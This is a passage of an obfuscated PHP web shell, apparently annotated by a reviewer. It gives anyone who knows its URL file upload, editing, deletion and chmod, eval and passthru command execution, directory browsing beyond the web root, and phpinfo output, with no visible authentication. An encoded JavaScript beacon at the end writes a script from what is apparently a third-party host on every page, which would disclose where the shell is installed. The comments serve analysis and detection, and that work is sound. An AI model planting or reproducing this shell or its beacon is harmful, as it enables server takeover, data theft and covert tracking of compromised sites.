function uploadfile() { if ($_FILES["filename"]["error"] != 0) { return "121212"; } $_POST["filename2"] = trim($_POST["filename2"]); if (empty($_POST["filename2"])) { $_POST["filename2"] = $_FILES["filename"]["name"]; } if (!copy($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) { if (!move_uploaded_file($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" .
$_POST["filename2"])) { return "File download failed..."; } } return "The file was uploaded successfully!"; } }
/*
 * Top-level script, run on every request once the class is defined.
 * The variable-variables below (${$GLOBALS["iknpldrpigo"]}, ${$wupyapffrye},
 * ${$bxmeyfko}, ...) all resolve to $content, and ${$GLOBALS["olmwrdqid"]} to
 * $timestart: the named variables hold those strings, assigned at the top of
 * the file or just below.
 * The session's current directory defaults to DOCUMENT_ROOT.
 */
$shell = new shell(); $timestart = $shell->getmicrotime(); $content = ""; if (!isset($_SESSION["currentdir"])) { $_SESSION["currentdir"] = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]); }
/*
 * Directory change: the GET parameter dir is appended to the current
 * directory and resolved with realpath(). No comparison against
 * DOCUMENT_ROOT is visible, so the browsing position is not confined to the
 * web root. The handle returned by opendir() is not closed here.
 */
if (isset($_GET["dir"])) { if (opendir(realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]))) { $_SESSION["currentdir"] = realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]); } Header("Location: {$xshell}?act=filemanager"); } $_SESSION["currentdir"] = str_replace("\\", "/", $_SESSION["currentdir"]); $bxmeyfko = "content"; if (substr($_SESSION["currentdir"], 1, 1) == "/") { $_SESSION["currentdir"] = substr($_SESSION["currentdir"], 0, 1); } $GLOBALS["lvsmiwfpysj"] = "content";
/*
 * State-changing dispatcher keyed on the POST field action: chmod, editfile,
 * execute (eval), exesys (passthru), mkdir, createfile, uploadfile.
 * No password, token or source-address check is visible anywhere before this
 * switch; as far as the visible code shows, the session only stores the
 * current directory. Anyone who knows the file's URL gets every function.
 */
switch ($_POST["action"]) { case "chmod": if ($shell->chmodfile($_POST["file"])) { ${$GLOBALS["iknpldrpigo"]} .= "The change was successful"; } break; case "editfile": if ($shell->editfile($_POST["file"])) { ${$wupyapffrye} .= "The edit was successful"; } break; case "execute": $shell->execute(); break; case "exesys": $shell->exesys(); break; case "mkdir": ${$GLOBALS["iknpldrpigo"]} .= $shell->createdir(); break; case "createfile": ${$dbmeztzpbjd} .= $shell->createfile(); break; case "uploadfile": ${$GLOBALS["iknpldrpigo"]} .= $shell->uploadfile(); break; } ${$GLOBALS["iknpldrpigo"]} .= $shell->outputhead(); ${$GLOBALS["iknpldrpigo"]} .= $shell->outputmenu();
/*
 * Page dispatcher keyed on the GET parameter act: edit, chmod, down,
 * filemanager, phpinfo, info, execute, exesys. Within filemanager, act2=del
 * and act3=del call the file and directory removal handlers defined earlier
 * in the file, so deletions are triggered by plain GET requests. act=phpinfo
 * prints the full phpinfo() page and exits.
 * Detection note: access-log entries for a single PHP file with query strings
 * of the form act=<one of the values above>, often with file= or dir=
 * carrying filesystem paths.
 */
switch ($_GET["act"]) { case "edit": ${$GLOBALS["gyyylpy"]} .= $shell->editfileform($_GET["file"]); break; case "chmod": ${$GLOBALS["lvsmiwfpysj"]} .= $shell->chmodform($_GET["file"]); break; case "down": ${$GLOBALS["iknpldrpigo"]} .= $shell->downloadfile($_GET["file"]); break; case "filemanager": if ($_GET["act2"] == "del") { ${$bxmeyfko} .= $shell->removefile(); } ${$GLOBALS["iknpldrpigo"]} .= $shell->outputfilemanager(); if ($_GET["act3"] == "del") { ${$hilzzmbb} .= $shell->removedir(); } break; case "phpinfo": phpinfo(); die; case
"info": ${$bcaxbgujhqyk} .= $shell->outputinfo(); break; case "execute": ${$GLOBALS["iknpldrpigo"]} .= $shell->executeform(); break; case "exesys": ${$GLOBALS["iknpldrpigo"]} .= $shell->exesysform(); break; } ${$GLOBALS["iknpldrpigo"]} .= $shell->outputdown(); echo ${$osezbewemuin}; echo "<center>Generation time: " . ($shell->getmicrotime() - ${$GLOBALS["olmwrdqid"]}) . "</center>";
/*
 * Appended to every response: an inline script that is not part of the file
 * manager UI. The first eval(unescape(...)) percent-decodes to a helper
 * p42d8c(s) that splits its argument on "12108557", unescapes both halves,
 * XORs each character of the first half with a digit of the key built from
 * the second half, and adds 7. The second eval calls
 * document.write(p42d8c('...')) on the embedded blob. Working the first four
 * characters by hand gives "<scr", so the written markup is most likely a
 * script element loaded from a third-party host, i.e. a beacon that discloses
 * where the shell is installed to whoever distributed it.
 * NOTE(review): confirm the full decoded value in an isolated analysis
 * environment rather than a normal browser, and check proxy/DNS logs for the
 * resulting hostname.
 */
echo "<script type=\"text/javascript\">\n<!-- \neval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%34%32%64%38%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%31%30%38%35%35%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%35%36%31%36%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%37%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%34%32%64%38%63%28%27') + '%30%6b%5b%62%63%6e%6e%11%69%6d%5d%30%19%64%6a%6a%60%32%2f%2b%78%75%76%26%6d%2c%35%20%67%57%66%20%6e%63%2d%74%5b%75%5e%67%74%2f%55%63%74%24%6b%69%1d%36%33%2a%69%5b%6c%6b%68%6a%3412108557%35%37%37%39%31%37%33' + unescape('%27%29%29%3b'));\n// -->\n</script>\n";